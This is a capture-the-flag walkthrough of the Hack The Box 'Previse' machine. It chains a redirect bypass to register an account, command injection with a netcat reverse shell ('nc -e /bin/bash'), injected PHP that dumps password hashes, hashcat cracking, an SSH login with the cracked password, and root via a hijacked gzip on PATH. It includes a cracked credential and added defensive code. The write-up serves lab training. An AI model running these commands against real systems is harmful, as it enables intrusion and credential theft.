Hack The Box walkthrough
IP address: 10.10.11.104
Welcome to the Previse write-up! This box is a little tricky on the user flag, but it forces you to think outside the box.
User own
Let’s start with nmap using the following options: -sV for version detection and -O for operating system detection. The latter option requires root privileges to work properly, so use sudo.
└─$ sudo nmap -sV -O 10.10.11.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 00:00 CEST
Nmap scan report for 10.10.11.104
Host is up (0.029s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Note: I’ve done some research on these versions and some directory bruteforcing, but there was nothing useful here.
Let’s explore the web application running on port 80.
It seems to be a PHP web application that redirects to a login page.
When using curl, it’s possible to get the real response page from the webapp because curl does not follow redirects by default, so we see the body the server sends along with the redirect.
curl -is -X GET 10.10.11.104/index.php
Hey, we’ve got a different page here: the index page. It includes a navigation menu with relative paths to the other pages of the web application.
Let’s explore something interesting: accounts.php.
curl -is -X GET 10.10.11.104/accounts.php
On that page there is a form (posting to the same page) with 3 input fields: username, password and confirm. Oh, and usernames and passwords must be between 5 and 32 characters.
We need to forge a specific curl POST request to create the new user hacker.
curl -is -X POST -d "username=hacker&password=hacker&confirm=hacker" 10.10.11.104/accounts.php
Ok, let’s try to log in with our new credentials: hacker/hacker.
And we’re in!
Now, there are some relevant sections here. Take your time to explore the website. I’ve downloaded a log file that gives me information about another user, m4lwhere. There is a form to upload a new file to the system and it is possible to download a backup of the entire web site.
This is the key to the entire hacking operation.
We can click on the file name to download that zip.
Once we’ve unzipped it, we can take a deep look at the web application code.
Look at file_logs.php: there is a form posting to logs.php to download a log file and, internally, it uses python to parse a parameter called delimeter.
We can move to the management menu > log data section, then edit that parameter to build something useful for our hack.
Set the delimeter parameter to the value comma && nc -e /bin/bash <my ip> 1234. This will launch a reverse shell using netcat to port 1234.
Note: This kind of attack is called Command injection.
So, let’s set up a netcat listener on the attacker box with the following command:
nc -lvp 1234
Next, we can inject the code directly into the select element using the browser tools (from the log data page, right-click the select for the file delimeter parameter and choose Inspect).
We know exactly what we are doing 🙂
The netcat listener now responds as expected: we’ve got a reverse shell on the target system as the www-data user.
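The root cause of the shell above is that the delimeter value ends up inside a shell command line. As an added example (not code from the box or this write-up), here is that pattern beside a hardened version; the parser path and the option names are assumptions:

```python
"""Added example, not code from the Previse box or this writeup: how the
delimeter form value should be handed to the parsing script. The parser path
and the option names are assumptions."""
import subprocess

# Assumed: the names the form offers, mapped to the literal delimiter character.
ALLOWED_DELIMITERS = {"comma": ",", "space": " ", "tab": "\t"}
# Assumed location of the Python log parser (the writeup does not name it).
PARSER = "/var/www/scripts/log_process.py"


def vulnerable_command_line(delimiter: str) -> str:
    """The bug pattern: the raw form value is pasted into a shell command line,
    so operators in it (&&, |, ;) are run by the shell instead of being treated
    as a delimiter. Returned as a string for inspection only, never executed."""
    return f"python3 {PARSER} {delimiter}"


def build_export_argv(delimiter_name: str) -> list[str]:
    """Hardened: allowlist the symbolic name and map it to the character, so no
    user-supplied bytes ever appear on the command line."""
    try:
        delimiter = ALLOWED_DELIMITERS[delimiter_name]
    except KeyError:
        raise ValueError(f"unsupported delimiter {delimiter_name!r}") from None
    return ["python3", PARSER, delimiter]


def run_export(delimiter_name: str) -> subprocess.CompletedProcess:
    """Run without a shell: argv goes straight to execve, so even a stray '&&'
    would only ever be a literal argument to the parser."""
    return subprocess.run(build_export_argv(delimiter_name),
                          capture_output=True, check=True)
```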
To find the first flag, we can list the m4lwhere home directory; inside it we will find a file called user.txt. Unfortunately that file is readable exclusively by m4lwhere.
So, we need to become m4lwhere to read the flag. We can modify a page of the web site to get all the users from the database in order to obtain the password hashes.
Let’s append this script to the status.php file:
<?php
// connectDB() is the application's own database helper
$db = connectDB();
// Dump every account together with its stored password hash
$query = "SELECT username, password FROM accounts";
$users = $db->query($query);
if ($users->num_rows > 0) {
    while ($row = mysqli_fetch_assoc($users)) {
        var_dump($row);
    }
}
$db->close();
We need to join the lines in our editor and append the result to status.php through the shell using this command (replace <code> with the one-line script):
echo '<code>' >> status.php
Next, we can refresh the status page to get the results.
So m4lwhere’s password hash is (the trailing dot is part of the hash):
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Note: Look at the image: I’ve got other players’ information too. There are even the credentials we used to log in.
Ok, we’ve got the password hash. Let’s reverse it using hashcat.
Note: Usually, the difficulty in the hash reversing process is finding the right hash format. Hashcat’s example hashes page shows the generic hash types.
Hashcat uses the following mode code for salted hashes in the $1$ format:
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Launch hashcat using the command (the hash is single-quoted so the shell does not expand the $ signs):
hashcat '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' rockyou.txt -m 500
and, after some time, it will show the corresponding password.
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
Now the question is: is this password the same as the system user m4lwhere’s? Let’s find out using ssh with these credentials:
- username: m4lwhere
- password: ilovecody112235!
ssh m4lwhere@10.10.11.104
It works!
We’re able to get the flag from the user’s home directory.
System own
First of all, we need to connect through SSH as the m4lwhere user.
Then we can take a look at the sudo permissions:
m4lwhere@previse:/tmp$ sudo -l
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
It seems that the access_backup.sh script can be run as root by m4lwhere. If we open the script, we can see that it uses the gzip command to create backups.
Let’s replace the system gzip with a custom one. We can create a gzip executable file in the /tmp directory with the following content:
sudo /bin/bash -c "cat /root/*" | tee rootfolder.txt
This uses a single bash command to cat everything inside the root folder and pipe it to the file rootfolder.txt.
Next, we need to edit the PATH environment variable so that /tmp is the first directory the system looks in for a command:
export PATH=/tmp:$PATH
Run the backup script using sudo.
sudo /opt/scripts/access_backup.sh
And then cat the content of our file.
cat rootfolder.txt
This gives us the root flag.
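The privilege escalation works only because the sudo-allowed script calls gzip by bare name, so the caller’s PATH decides which gzip runs. As an added audit helper (not code from the box or this write-up), the following lists every command a shell script invokes without an absolute path; the builtin and keyword lists are assumed and partial, and the sample script is constructed:

```python
"""Added audit helper, not part of the Previse box or this writeup: list the
commands a shell script invokes by bare name, i.e. resolved through PATH.
A script that sudo lets a user run as root should call /bin/gzip, not gzip."""
import shlex

# Tokens after which the next word is again a command (assumed, partial list).
COMMAND_FOLLOWS = {"if", "then", "else", "elif", "do", "while", "until", "!",
                   "time", "(", "{", "|", "||", "&&", ";", "&"}
# Builtins/keywords that are never looked up in PATH (assumed, partial list).
NOT_IN_PATH = {"cd", "echo", "export", "exit", "return", "set", "unset", "test",
               "[", "[[", "for", "done", "fi", "esac", "}", ")", "read", "local"}
REDIRECTS = {"<", ">", ">>", "<<", "<<<", "<&", ">&"}

def unqualified_commands(script: str) -> list[tuple[int, str]]:
    """Return (line_no, name) for every command word that contains no slash."""
    findings = []
    for line_no, line in enumerate(script.splitlines(), 1):
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        try:
            tokens = list(lexer)
        except ValueError:            # unbalanced quotes: report nothing
            continue
        expect_command, skip_next = True, False
        for tok in tokens:
            if skip_next or tok in REDIRECTS:      # a redirection and its target
                skip_next = tok in REDIRECTS
                continue
            if tok in COMMAND_FOLLOWS:
                expect_command = True
                continue
            if not expect_command:
                continue
            if "=" in tok and not tok.startswith("="):   # VAR=value prefix
                continue
            expect_command = False
            if tok in NOT_IN_PATH or tok.startswith("$") or "/" in tok:
                continue
            findings.append((line_no, tok))
    return findings

# Constructed sample in the spirit of the box's backup script (not the real one)
SAMPLE_SCRIPT = """#!/bin/bash
gzip -c /var/www/file_access_logs/access.log > /var/backups/access.gz
/bin/tar -czf /var/backups/backup.tgz /var/www/file_access_logs
echo "done" | tee /var/backups/log.txt
"""
```

Running unqualified_commands(SAMPLE_SCRIPT) reports gzip on line 2 and tee on line 4, while the absolute /bin/tar is not reported.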
Well Done!
Mattia Peretti
Hackhouse.net author